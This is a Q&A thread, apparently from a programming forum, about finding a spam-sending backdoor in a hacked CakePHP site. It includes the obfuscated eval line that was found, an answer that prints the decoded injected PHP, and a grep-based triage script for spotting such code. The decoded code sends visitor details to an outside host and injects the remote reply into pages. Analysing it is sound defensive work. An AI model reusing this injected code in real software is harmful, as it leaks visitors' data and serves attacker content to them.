
Possible Duplicate:
My server's been hacked EMERGENCY

So basically my site got hacked and a script is sending more than 400 emails per day. I have more than 100 files on the server; is there any fast way to check from which file exactly it is being sent? I don't know when exactly the script is sending the mails, so I can't be sure from which file it's called. Is there any easy way to find out from which file it's sent?

 eval(gzuncompress(base64_decode('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'))); ?> 

This was found in the index.php file.

My site is using CakePHP, so could it be there by default?

Pienskabe
  • Probably belongs in Server Fault –  Apr 29 '12 at 17:47
  • looked up the mail headers? php may set the called send script as one next to the php version or so –  Apr 29 '12 at 17:49
  • First I would check the timestamp to see which file was edited recently. –  Apr 29 '12 at 17:50
  • Search for `eval`. Also, 100 files should only take about 20 mins to skim through to see something you don't recognize. Usually this type of thing is obvious, and easy to spot at a glance. – Brad Apr 29 '12 at 17:50
  • Gonna take a look in a sec. –  Apr 29 '12 at 17:50
  • Found one eval in index.php file, check my post. –  Apr 29 '12 at 17:51

3 Answers


Be sure to read this topic. The best thing is to restore from backup. Also, when you do this, try to find out how they got in. Your code is probably flawed, so you will need to evaluate every single file by hand to find where your code is insecure. Refer to OWASP for best practices in securing web applications.

Lucas Kauffman

Here, I unraveled the code for you:

if (!isset($sRetry)) {
    global $sRetry;
    $sRetry = 1;
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    $stCurlHandle = NULL;
    $stCurlLink = "";

    // Only act on visitors whose user agent looks like neither a search-engine
    // crawler nor a mainstream browser, so the injected content is less likely
    // to be noticed or indexed.
    if ((strstr($sUserAgent, 'google') == false)
        && (strstr($sUserAgent, 'yahoo') == false)
        && (strstr($sUserAgent, 'baidu') == false)
        && (strstr($sUserAgent, 'msn') == false)
        && (strstr($sUserAgent, 'opera') == false)
        && (strstr($sUserAgent, 'chrome') == false)
        && (strstr($sUserAgent, 'bing') == false)
        && (strstr($sUserAgent, 'safari') == false)
        && (strstr($sUserAgent, 'bot') == false)) {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) {
            // Build a request to a remote server that reports the visitor's IP,
            // user agent, host name and requested path.
            $stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw')
                . 'ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                . '&useragent=' . urlencode($sUserAgent)
                . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                . '&check=' . isset($_GET['look']);
            $stCurlHandle = curl_init($stCurlLink);
        }
    }

    if ($stCurlHandle !== NULL) {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        // If the remote reply starts with "O", blank that marker byte and
        // echo the rest of the reply straight into the page output.
        if ($sResult[0] == "O") {
            $sResult[0] = " ";
            echo $sResult;
        }
        curl_close($stCurlHandle);
    }
}

That $stCurlLink ends up becoming http://adveconfirm.com/stat/stat.php. I would recommend removing the code from the page and patching any vulnerabilities that you find. Take a look at your logs to see what pages were accessed by whom and what data was sent.

citruspi

You could also download all of the files using FTP, open them all with Notepad++ and search all the pages for "mail(". This should tell you where the mail scripts are in your site. Also beware in case there are viruses that the hacker(s) added to your site.

Ethan H
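The three suggestions made in this thread (check modification timestamps, search for eval, search for "mail(") combined into one triage script, as an added example that is not code from the question or any of the answers; the web root path in the usage line and the sample files are constructed assumptions.

```bash
#!/usr/bin/env bash
# Added triage helper, not code from the thread. Combines the suggestions made
# above: list recently modified PHP files, grep for the eval/base64 idiom that
# was found in the hacked index.php, and grep for calls to mail(). The path in
# the usage line is a placeholder.
set -u

# Prints PHP files under $1 modified within the last $2 days, one per line.
# A freshly edited file in an otherwise old code base is the first suspect.
recently_modified_php() {
    find "$1" -type f -name '*.php' -mtime "-$2"
}

# Prints "path:line:text" for every line in a PHP file under $1 that contains
# eval() wrapping a base64_decode() payload (optionally inside gzuncompress()
# or gzinflate()) or a whole-word call to mail() (so "sendmail(" is ignored).
# Exit status is grep's: 0 when something was found, 1 when the tree is clean.
find_suspicious_php() {
    grep -rnE --include='*.php' \
        -e 'eval\((gzuncompress|gzinflate)?\(?base64_decode\(' \
        -e '(^|[^[:alnum:]_])mail\(' \
        "$1" 2>/dev/null
}

# Usage: ./triage.sh /var/www/html [days]   (placeholder path, default 7 days)
if [ "${1:-}" ]; then
    echo "== PHP files modified in the last ${2:-7} days =="
    recently_modified_php "$1" "${2:-7}"
    echo "== eval(base64_decode(...)) and mail() hits =="
    find_suspicious_php "$1"
fi
```

Review every hit by hand: a legitimate contact form will show up under mail() too, so the point is to get the list of candidate files down from 100 to a handful.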